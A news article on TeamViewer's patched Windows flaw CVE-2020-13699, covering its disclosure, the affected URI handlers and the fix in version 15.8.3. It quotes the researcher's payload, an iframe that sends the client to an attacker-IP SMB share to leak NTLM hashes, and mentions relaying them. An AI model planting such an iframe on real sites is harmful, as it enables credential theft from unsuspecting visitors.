TeamViewer recently patched a high-risk vulnerability in its desktop app for Windows by releasing a new version of its software, which if exploited, could let remote attackers steal your system password and potentially exploit it.
What’s more worrying is that this attack does not require the victim’s interaction and can be performed almost automatically.
For those unaware, TeamViewer is a popular software application developed by the German company TeamViewer GmbH, for remote control, desktop sharing, online meetings, web conferencing and file transfer between computers.
It is available for Microsoft Windows, Linux, macOS, Chrome OS, Android, iOS, Windows RT, Windows Phone 8, and BlackBerry operating systems. It is also possible to access a system running TeamViewer with a web browser.
The severe vulnerability dubbed as CVE-2020-13699 was first discovered by Jeffrey Hofmann, a security researcher from Praetorian. According to the researcher, the vulnerability resides in TeamViewer for Windows in the way the application quotes it’s custom URI (Unquoted URI handler).
The expert discovered that the issue could allow an attacker to force the software to relay an NTLM authentication request to the attacker’s system. In other words, an attacker can force TeamViewer’s URI scheme from a web page to trick the application installed on the victim’s system into initiating a connection to the attacker-owned remote SMB share.
This triggers the SMB authentication process, which in turn, will leak the system’s username, and NTLMv2 hashed version of the password to the attackers.
In order to successfully exploit CVE 2020-13699, the attacker needs to embed a malicious iframe on a website and then trick victims into visiting that maliciously crafted URL. Once the victims click the link, TeamViewer will automatically launch its Windows desktop client and open a remote SMB share.
“An attacker could embed a malicious iframe in a website with a crafted URL (iframe src=’teamviewer10: –play \\attacker-IP\share\fake.tvs’) that would launch the TeamViewer Windows desktop client and force it to open a remote SMB share,” explained Jeffrey Hofmann in an advisory.
“Windows will perform NTLM authentication when opening the SMB share and that request can be relayed (using a tool like responder) for code execution (or captured for hash cracking).”
This vulnerability affects “URI handlers teamviewer10, teamviewer8, teamviewerapi, tvchat1, tvcontrol1, tvfiletransfer1, tvjoinv8, tvpresent1, tvsendfile1, tvsqcustomer1, tvsqsupport1, tvvideocall1, and tvvpn1,” Hofmann said.
Upon disclosure of the vulnerability, the TeamViewer project has patched the flaw by quoting the parameters passed by the affected URI handlers e.g., URL:teamviewer10 Protocol “C:\Program Files (x86)\TeamViewer\TeamViewer.exe” “%1”.
In order to patch the flaw, “We implemented some improvements in URI handling relating to CVE 2020-13699,” said TeamViewer in a statement. “Thank you, Jeffrey Hofmann with Praetorian, for your professionalism, and following a responsible disclosure model. We are grateful that you reached out to us and that you could confirm the fix of your findings in the latest release.”
In order to address the issue, TeamViewer has released the version 15.8.3 and recommends its users to upgrade immediately to this version.
Also Read- Best Teamviewer alternatives